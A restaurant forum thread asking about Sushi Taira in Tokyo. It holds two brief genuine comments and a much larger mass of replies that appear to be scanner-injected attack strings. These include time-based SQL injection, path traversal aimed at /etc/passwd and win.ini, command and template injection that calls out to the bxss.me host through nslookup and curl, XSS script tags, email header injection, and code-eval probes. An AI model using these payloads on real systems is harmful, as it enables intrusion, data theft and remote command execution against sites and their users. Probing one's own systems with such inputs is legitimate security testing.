Has anyone tried Sushi Taira? Since they discourage the posting of reviews online (and they don't even have a Google Maps pin, due to store policy), I don't really have much to go on, including details of the course, or style of the nigiri. That said, I was interested because the few reviews that do exist are pretty positive: https://tabelog.com/tokyo/A1307/A130702/13271063/
5 Comments
I would also be interested to know more!
re: mirugai
HcHt355E
re: mirugai
1*
re: mirugai
1*
re: mirugai
1*
re: mirugai
1*
re: mirugai
-1 OR 2+937-937-1=0+0+0+1
re: mirugai
-1 OR 3+937-937-1=0+0+0+1
re: mirugai
if(now()=sysdate(),sleep(15),0)
re: mirugai
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: mirugai
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: mirugai
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: mirugai
-1; waitfor delay '0:0:15' --
re: mirugai
-1); waitfor delay '0:0:15' --
re: mirugai
1 waitfor delay '0:0:15' --
re: mirugai
NR9s1T1r'; waitfor delay '0:0:15' --
re: mirugai
-5 OR 632=(SELECT 632 FROM PG_SLEEP(15))--
re: mirugai
-5) OR 824=(SELECT 824 FROM PG_SLEEP(15))--
re: mirugai
-1)) OR 778=(SELECT 778 FROM PG_SLEEP(15))--
re: mirugai
7B9QbDi1' OR 247=(SELECT 247 FROM PG_SLEEP(15))--
re: mirugai
XFQWPOOH') OR 986=(SELECT 986 FROM PG_SLEEP(15))--
re: mirugai
O1R11dfu')) OR 656=(SELECT 656 FROM PG_SLEEP(15))--
re: mirugai
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: mirugai
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: mirugai
'||(select 1 from (select pg_sleep(15))x)||'
re: mirugai
''||(select 1 from (select pg_sleep(15))x)||''
re: mirugai
1'"
re: mirugai
@@UFaU7
re: mirugai
1Dfq25rTINO
re: mirugai
%0abcc:074625.67-22421.67.2b360.19990.2@bxss.me
re: mirugai
to@example.com>%0d%0abcc:074625.67-22422.67.2b360.19990.2@bxss.me
re: mirugai
response.write(9542128*9554310)
re: mirugai
'+response.write(9542128*9554310)+'
re: mirugai
<esi:include src="http://bxss.me/rpb.png"/>
re: mirugai
"+response.write(9542128*9554310)+"
re: mirugai
${9999938+9999626}
re: mirugai
../../../../../../../../../../../../../../etc/passwd
re: mirugai
../../../../../../../../../../../../../../windows/win.ini
re: mirugai
file:///etc/passwd
re: mirugai
'.gethostbyname(lc('hityw'.'iqourjxadaaf1.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(69).chr(120).chr(76).'
re: mirugai
../../../../../../../../../../../../../../../proc/version
re: mirugai
".gethostbyname(lc("hitzr"."fmmumawzcf061.bxss.me."))."A".chr(67).chr(hex("58")).chr(113).chr(89).chr(110).chr(79)."
re: mirugai
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: mirugai
)
re: mirugai
../../../../../../../../../../etc/passwd%00.jpg
re: mirugai
!(()&&!|*|*|
re: mirugai
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: mirugai
^(#$!@#$)(()))******
re: mirugai
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: mirugai
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: mirugai
/etc/passwd
re: mirugai
%2fetc%2fpasswd
re: mirugai
echo crhpgw$()\ gqqsjr\nz^xyu||a #' &echo crhpgw$()\ gqqsjr\nz^xyu||a #|" &echo crhpgw$()\ gqqsjr\nz^xyu||a #
re: mirugai
/.././.././.././.././.././.././.././../etc/./passwd%00
re: mirugai
HttP://bxss.me/t/xss.html?%00
re: mirugai
&echo oxflzh$()\ dlxaqk\nz^xyu||a #' &echo oxflzh$()\ dlxaqk\nz^xyu||a #|" &echo oxflzh$()\ dlxaqk\nz^xyu||a #
re: mirugai
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: mirugai
"+"A".concat(70-3).concat(22*4).concat(122).concat(72).concat(98).concat(66)+(require"socket"
Socket.gethostbyname("hitkm"+"hueumvxea5bdd.bxss.me.")[3].to_s)+"
re: mirugai
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: mirugai
bxss.me/t/xss.html?%00
re: mirugai
|echo iiaowz$()\ nzkact\nz^xyu||a #' |echo iiaowz$()\ nzkact\nz^xyu||a #|" |echo iiaowz$()\ nzkact\nz^xyu||a #
re: mirugai
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: mirugai
'+'A'.concat(70-3).concat(22*4).concat(112).concat(77).concat(115).concat(75)+(require'socket'
Socket.gethostbyname('hitju'+'lsabujoea09ac.bxss.me.')[3].to_s)+'
re: mirugai
';print(md5(31337));$a='
re: mirugai
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: mirugai
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: mirugai
(nslookup hithteeudqptv12d29.bxss.me||perl -e "gethostbyname('hithteeudqptv12d29.bxss.me')")
re: mirugai
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: mirugai
";print(md5(31337));$a="
re: mirugai
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: mirugai
$(nslookup hitqmlbsqgfhx895e2.bxss.me||perl -e "gethostbyname('hitqmlbsqgfhx895e2.bxss.me')")
re: mirugai
Http://bxss.me/t/fit.txt
re: mirugai
${@print(md5(31337))}
re: mirugai
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: mirugai
&nslookup hitulknclwvkl2e088.bxss.me&'\"`0&nslookup hitulknclwvkl2e088.bxss.me&`'
re: mirugai
http://bxss.me/t/fit.txt%3F.jpg
re: mirugai
${@print(md5(31337))}\
re: mirugai
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: mirugai
&(nslookup hitezeecvhzhj158a0.bxss.me||perl -e "gethostbyname('hitezeecvhzhj158a0.bxss.me')")&'\"`0&(nslookup hitezeecvhzhj158a0.bxss.me||perl -e "gethostbyname('hitezeecvhzhj158a0.bxss.me')")&`'
re: mirugai
/etc/shells
re: mirugai
'.print(md5(31337)).'
re: mirugai
file:///etc/passwd
re: mirugai
'"
re: mirugai
|(nslookup hitgizrwklsgw1ff14.bxss.me||perl -e "gethostbyname('hitgizrwklsgw1ff14.bxss.me')")
re: mirugai
c:/windows/win.ini
re: mirugai
/\../\../\../\../\../\../\../etc/passwd
re: mirugai
<!--
re: mirugai
`(nslookup hitvweyoqrmqq87224.bxss.me||perl -e "gethostbyname('hitvweyoqrmqq87224.bxss.me')")`
re: mirugai
bxss.me
re: mirugai
/WEB-INF/web.xml
re: mirugai
;(nslookup hitxcvdazmfnla3c2b.bxss.me||perl -e "gethostbyname('hitxcvdazmfnla3c2b.bxss.me')")|(nslookup hitxcvdazmfnla3c2b.bxss.me||perl -e "gethostbyname('hitxcvdazmfnla3c2b.bxss.me')")&(nslookup hitxcvdazmfnla3c2b.bxss.me||perl -e "gethostbyname('hitxcvdazmfnla3c2b.bxss.me')")
re: mirugai
C:\WINDOWS\system32\drivers\etc\hosts
re: mirugai
../../../../../../../../../../windows/win.ini%00.jpg
re: mirugai
/../../../../../../../../../../boot.ini
re: mirugai
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: mirugai
..\..\..\..\..\..\..\..\windows\win.ini
re: mirugai
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: mirugai
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: mirugai
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: mirugai
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: mirugai
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: mirugai
WEB-INF/web.xml
re: mirugai
WEB-INF\web.xml
re: mirugai
12DIP72XH0
re: mirugai
response.write(9183815*9548693)
re: mirugai
'+response.write(9183815*9548693)+'
re: mirugai
"+response.write(9183815*9548693)+"
re: mirugai
<esi:include src="http://bxss.me/rpb.png"/>
re: mirugai
../../../../../../../../../../../../../../etc/passwd
re: mirugai
${10000144+9999452}
re: mirugai
../../../../../../../../../../../../../../windows/win.ini
re: mirugai
file:///etc/passwd
re: mirugai
../
re: mirugai
)
re: mirugai
!(()&&!|*|*|
re: mirugai
^(#$!@#$)(()))******
re: mirugai
redirtest.acx
re: mirugai
ctime
sleep
p0
(I30
tp1
Rp2
.
re: mirugai
echo ezqmyq$()\ ifqupu\nz^xyu||a #' &echo ezqmyq$()\ ifqupu\nz^xyu||a #|" &echo ezqmyq$()\ ifqupu\nz^xyu||a #
re: mirugai
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: mirugai
&echo hjeukf$()\ qbecee\nz^xyu||a #' &echo hjeukf$()\ qbecee\nz^xyu||a #|" &echo hjeukf$()\ qbecee\nz^xyu||a #
re: mirugai
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs .jpg
re: mirugai
|echo dhzguz$()\ soophm\nz^xyu||a #' |echo dhzguz$()\ soophm\nz^xyu||a #|" |echo dhzguz$()\ soophm\nz^xyu||a #
re: mirugai
'.gethostbyname(lc('hitjx'.'innrxcjkc2a19.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(89).chr(100).chr(87).'
re: mirugai
/etc/shells
re: mirugai
expr 9000142382 - 939444
re: mirugai
../../../../../../../../../../../../../../etc/shells
re: mirugai
(nslookup -q=cname hitnobxrjyzroa9950.bxss.me||curl hitnobxrjyzroa9950.bxss.me))
re: mirugai
".gethostbyname(lc("hitcw"."ypypiigked5e3.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(85).chr(105).chr(82)."
re: mirugai
c:/windows/win.ini
re: mirugai
$(nslookup -q=cname hitvtshlhvcqm81de6.bxss.me||curl hitvtshlhvcqm81de6.bxss.me)
re: mirugai
gethostbyname(lc('hitrq'.'lqxzezhp1133e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(75).chr(105).chr(65)
re: mirugai
bxss.me
re: mirugai
&nslookup -q=cname hitokrmwhxuyle5404.bxss.me&'\"`0&nslookup -q=cname hitokrmwhxuyle5404.bxss.me&`'
re: mirugai
Http://bxss.me/t/fit.txt
re: mirugai
&(nslookup -q=cname hitwlxgndmfns90fd2.bxss.me||curl hitwlxgndmfns90fd2.bxss.me)&'\"`0&(nslookup -q=cname hitwlxgndmfns90fd2.bxss.me||curl hitwlxgndmfns90fd2.bxss.me)&`'
re: mirugai
http://bxss.me/t/fit.txt?.jpg
re: mirugai
|(nslookup -q=cname hitiycdsgyrud2c976.bxss.me||curl hitiycdsgyrud2c976.bxss.me)
re: mirugai
HttP://bxss.me/t/xss.html?%00
re: mirugai
`(nslookup -q=cname hitwvixvcfmrt09764.bxss.me||curl hitwvixvcfmrt09764.bxss.me)`
re: mirugai
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: mirugai
bxss.me/t/xss.html?%00
re: mirugai
;(nslookup -q=cname hittuvgoemhpea4335.bxss.me||curl hittuvgoemhpea4335.bxss.me)|(nslookup -q=cname hittuvgoemhpea4335.bxss.me||curl hittuvgoemhpea4335.bxss.me)&(nslookup -q=cname hittuvgoemhpea4335.bxss.me||curl hittuvgoemhpea4335.bxss.me)
re: mirugai
';print(md5(31337));$a='
re: mirugai
|(nslookup${IFS}-q${IFS}cname${IFS}hithiieukybgo70e62.bxss.me||curl${IFS}hithiieukybgo70e62.bxss.me)
re: mirugai
";print(md5(31337));$a="
re: mirugai
&(nslookup${IFS}-q${IFS}cname${IFS}hittefxpvyyca8bd66.bxss.me||curl${IFS}hittefxpvyyca8bd66.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hittefxpvyyca8bd66.bxss.me||curl${IFS}hittefxpvyyca8bd66.bxss.me)&`'
re: mirugai
${@print(md5(31337))}
re: mirugai
${@print(md5(31337))}\
re: mirugai
'.print(md5(31337)).'
re: mirugai
'"()
re: mirugai
"+"A".concat(70-3).concat(22*4).concat(121).concat(83).concat(118).concat(87)+(require"socket"
Socket.gethostbyname("hitah"+"akfxiogb062f4.bxss.me.")[3].to_s)+"
re: mirugai
'&&sleep(27*1000)*wuqlmt&&'
re: mirugai
'+'A'.concat(70-3).concat(22*4).concat(120).concat(73).concat(102).concat(67)+(require'socket'
Socket.gethostbyname('hitsu'+'nqfnboax9b4f6.bxss.me.')[3].to_s)+'
re: mirugai
"&&sleep(27*1000)*umytxj&&"
re: mirugai
'A'.concat(70-3).concat(22*4).concat(119).concat(70).concat(120).concat(82)+(require'socket'
Socket.gethostbyname('hitol'+'ybdzdcol38f35.bxss.me.')[3].to_s)
re: mirugai
'||sleep(27*1000)*scgmvo||'
re: mirugai
replies
re: mirugai
"||sleep(27*1000)*mqxwqs||"
re: mirugai
replies
re: mirugai
replies/.
re: mirugai
'"
re: mirugai
<!--
re: mirugai
'"()&%<zzz><ScRiPt >0m2Q(9958)</ScRiPt>
re: mirugai
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hityrrngxknuu885bf.bxss.me")}}
re: mirugai
'"()&%<zzz><ScRiPt >0m2Q(9394)</ScRiPt>
re: mirugai
9940246
re: mirugai
tuFFK9Jt
re: mirugai
*1
re: mirugai
*1
re: mirugai
*1
re: mirugai
*1
re: mirugai
-1 OR 5*5=25 --
re: mirugai
-1 OR 5*5=26 --
re: mirugai
-1 OR 5*5=25
re: mirugai
-1 OR 5*5=26
re: mirugai
*if(now()=sysdate(),sleep(15),0)
re: mirugai
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: mirugai
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: mirugai
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: mirugai
-1; waitfor delay '0:0:15' --
re: mirugai
-1); waitfor delay '0:0:15' --
re: mirugai
-1 waitfor delay '0:0:15' --
re: mirugai
yNc7hnXi'; waitfor delay '0:0:15' --
re: mirugai
-1 OR 762=(SELECT 762 FROM PG_SLEEP(15))--
re: mirugai
-1) OR 405=(SELECT 405 FROM PG_SLEEP(15))--
re: mirugai
-1)) OR 45=(SELECT 45 FROM PG_SLEEP(15))--
re: mirugai
8IL0N9yV' OR 110=(SELECT 110 FROM PG_SLEEP(15))--
re: mirugai
R5Xwq1WS') OR 470=(SELECT 470 FROM PG_SLEEP(15))--
re: mirugai
YnERCfug')) OR 220=(SELECT 220 FROM PG_SLEEP(15))--
re: mirugai
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: mirugai
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: mirugai
'||(select 1 from (select pg_sleep(15))x)||'
re: mirugai
''||(select 1 from (select pg_sleep(15))x)||''
re: mirugai
'"
re: mirugai
@@ly1UE
re: mirugai
(select 198766*667891)
re: mirugai
(select 198766*667891 from DUAL)
I went earlier in the year and wasn't impressed. The price is going up again so I don't recommend it. Will post a full review soon.
re: thetokyogourmet
XQHRBqhx
re: thetokyogourmet
1*
re: thetokyogourmet
1*
re: thetokyogourmet
1*
re: thetokyogourmet
1*
re: thetokyogourmet
-1 OR 2+740-740-1=0+0+0+1
re: thetokyogourmet
-1 OR 3+740-740-1=0+0+0+1
re: thetokyogourmet
if(now()=sysdate(),sleep(15),0)
re: thetokyogourmet
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: thetokyogourmet
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: thetokyogourmet
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: thetokyogourmet
-1; waitfor delay '0:0:15' --
re: thetokyogourmet
-1); waitfor delay '0:0:15' --
re: thetokyogourmet
1 waitfor delay '0:0:15' --
re: thetokyogourmet
BH0seWrF'; waitfor delay '0:0:15' --
re: thetokyogourmet
-5 OR 52=(SELECT 52 FROM PG_SLEEP(15))--
re: thetokyogourmet
-5) OR 285=(SELECT 285 FROM PG_SLEEP(15))--
re: thetokyogourmet
-1)) OR 179=(SELECT 179 FROM PG_SLEEP(15))--
re: thetokyogourmet
i1kxPFpp' OR 332=(SELECT 332 FROM PG_SLEEP(15))--
re: thetokyogourmet
fUllIzqj') OR 520=(SELECT 520 FROM PG_SLEEP(15))--
re: thetokyogourmet
JO8TKGYa')) OR 176=(SELECT 176 FROM PG_SLEEP(15))--
re: thetokyogourmet
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: thetokyogourmet
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: thetokyogourmet
'||(select 1 from (select pg_sleep(15))x)||'
re: thetokyogourmet
''||(select 1 from (select pg_sleep(15))x)||''
re: thetokyogourmet
1'"
re: thetokyogourmet
@@c1S5a
re: thetokyogourmet
1CEffnmvf6O
re: thetokyogourmet
response.write(9173981*9473865)
re: thetokyogourmet
'+response.write(9173981*9473865)+'
re: thetokyogourmet
%0abcc:074625.67-22062.67.b6436.19990.2@bxss.me
re: thetokyogourmet
"+response.write(9173981*9473865)+"
re: thetokyogourmet
to@example.com>%0d%0abcc:074625.67-22063.67.b6436.19990.2@bxss.me
re: thetokyogourmet
<esi:include src="http://bxss.me/rpb.png"/>
re: thetokyogourmet
${9999175+10000408}
re: thetokyogourmet
../../../../../../../../../../../../../../etc/passwd
re: thetokyogourmet
../../../../../../../../../../../../../../windows/win.ini
re: thetokyogourmet
file:///etc/passwd
re: thetokyogourmet
../../../../../../../../../../../../../../../proc/version
re: thetokyogourmet
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: thetokyogourmet
../../../../../../../../../../etc/passwd%00.jpg
re: thetokyogourmet
'.gethostbyname(lc('hitlo'.'uikhvcrcc38b2.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(71).chr(100).chr(84).'
re: thetokyogourmet
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: thetokyogourmet
)
re: thetokyogourmet
".gethostbyname(lc("hittc"."acxvapki59c18.bxss.me."))."A".chr(67).chr(hex("58")).chr(117).chr(67).chr(119).chr(66)."
re: thetokyogourmet
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: thetokyogourmet
!(()&&!|*|*|
re: thetokyogourmet
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: thetokyogourmet
^(#$!@#$)(()))******
re: thetokyogourmet
/etc/passwd
re: thetokyogourmet
echo ywgbso$()\ emyiws\nz^xyu||a #' &echo ywgbso$()\ emyiws\nz^xyu||a #|" &echo ywgbso$()\ emyiws\nz^xyu||a #
re: thetokyogourmet
%2fetc%2fpasswd
re: thetokyogourmet
